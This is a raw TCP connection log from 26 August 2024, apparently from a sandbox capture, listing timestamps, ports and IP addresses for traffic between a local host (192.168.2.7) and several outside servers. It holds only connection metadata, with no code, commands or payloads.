Aug 26, 2024 23:29:15.339284897 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.339298964 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.339303017 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.339312077 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.339339972 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.339364052 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.339371920 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.339382887 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.339392900 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.339404106 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.339413881 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.339416981 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.339447975 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.339467049 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.403826952 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.403846979 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.403888941 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.403919935 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.403939009 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.403955936 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.403966904 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.403976917 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.403987885 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.403991938 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.403999090 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.404004097 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.404015064 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.404026031 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.404053926 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.404079914 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.404117107 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.404129028 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.404139042 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.404150009 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.404161930 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.404184103 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.404210091 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.426527977 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426543951 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426554918 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426567078 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426579952 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426589966 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.426599026 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426611900 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426623106 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426635027 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426651955 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426656961 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.426665068 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426676035 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426681042 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.426688910 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426702023 CEST	80	49726	154.216.18.223	192.168.2.7
Aug 26, 2024 23:29:15.426703930 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.426723003 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.426748037 CEST	49726	80	192.168.2.7	154.216.18.223
Aug 26, 2024 23:29:15.440721035 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:15.445816040 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:15.445986032 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:15.459374905 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:15.464245081 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:16.023061037 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:16.029006958 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:16.029112101 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:16.041754007 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:16.046658039 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:16.092264891 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:16.131320000 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:16.136230946 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:16.153083086 CEST	49725	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:16.153516054 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:16.158205032 CEST	80	49725	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:16.158262968 CEST	49725	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:16.158296108 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:16.158379078 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:16.158694983 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:16.163466930 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:16.321260929 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:16.370842934 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:16.688211918 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:16.749358892 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:16.842295885 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:16.847317934 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:16.922339916 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:16.922401905 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:16.924124956 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:16.929733038 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.043719053 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:17.136456966 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:17.171339989 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.171406984 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.171439886 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.171446085 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.171473026 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.171473026 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.171499968 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.171508074 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.171515942 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.171540022 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.171554089 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.171575069 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.171613932 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.171622992 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.171654940 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.171660900 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.171686888 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.171696901 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.171721935 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.171736002 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.171773911 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.176701069 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.176759005 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.176759958 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.176791906 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.176803112 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.176846981 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.321547031 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.321584940 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.321618080 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.321635962 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.321646929 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.321671009 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.321695089 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.321715117 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.321721077 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.321754932 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.321755886 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.321795940 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.321799994 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.321834087 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.321845055 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.321886063 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.322144985 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.322196007 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.322230101 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.322244883 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.322262049 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.322289944 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.322320938 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.322704077 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.322732925 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.322747946 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.322773933 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.322805882 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.322860956 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.322885990 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.322935104 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.322936058 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.322969913 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.322983980 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.323000908 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.323036909 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.323045015 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.323072910 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.323749065 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.323802948 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.323807001 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.323838949 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.323846102 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.323873997 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.323935986 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.324201107 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.324248075 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.326852083 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.326886892 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.326936007 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.425128937 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.425211906 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.471806049 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.471882105 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.471890926 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.471919060 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.471930981 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.471952915 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.471993923 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472039938 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472044945 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472076893 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472086906 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472111940 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472124100 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472145081 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472160101 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472177029 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472181082 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472210884 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472233057 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472244024 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472259998 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472278118 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472285986 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472331047 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472332954 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472381115 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472383022 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472414970 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472436905 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472455978 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472466946 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472538948 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472587109 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472592115 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472620010 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472654104 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472662926 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472686052 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472692966 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472719908 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472752094 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472775936 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472783089 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472794056 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472819090 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.472822905 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.472858906 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.473243952 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473294020 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473299026 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.473326921 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473337889 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.473361015 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.473443985 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473475933 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473509073 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473526001 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.473543882 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473568916 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.473592997 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.473759890 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473792076 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473822117 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.473843098 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473850012 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.473891020 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473923922 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.473923922 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.473925114 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473957062 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473970890 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.473989964 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.473998070 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.474021912 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.474060059 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.474062920 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.474091053 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.474102974 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.474129915 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.474390030 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.474421978 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.474442959 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.474462032 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.474471092 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.474502087 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.474519014 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.474534988 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.474545956 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.474566936 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.474579096 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.474600077 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.474602938 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.474646091 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.621923923 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.621948957 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.621959925 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.621973038 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.621984959 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.621990919 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.621999025 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622016907 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622019053 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.622056961 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622060061 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.622067928 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622085094 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622093916 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.622121096 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.622189999 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622230053 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.622298002 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622308969 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622349024 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622359991 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.622363091 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622406960 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.622417927 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.622477055 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622523069 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.622558117 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622566938 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622606993 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.622608900 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622620106 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.622665882 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623043060 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623085022 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623095036 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623121023 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623131990 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623156071 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623167038 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623183966 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623194933 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623199940 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623229027 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623235941 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623245955 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623255968 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623267889 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623284101 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623298883 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623322964 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623337030 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623347044 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623358011 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623369932 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623377085 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623399973 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623428106 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623524904 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623569012 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623577118 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623588085 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623621941 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623631954 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623646021 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623647928 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623656988 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623667002 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623670101 CEST	80	49730	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:17.623687983 CEST	49730	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:17.623756886 CEST	80	49730	185.215.113.16	192.168.2.7
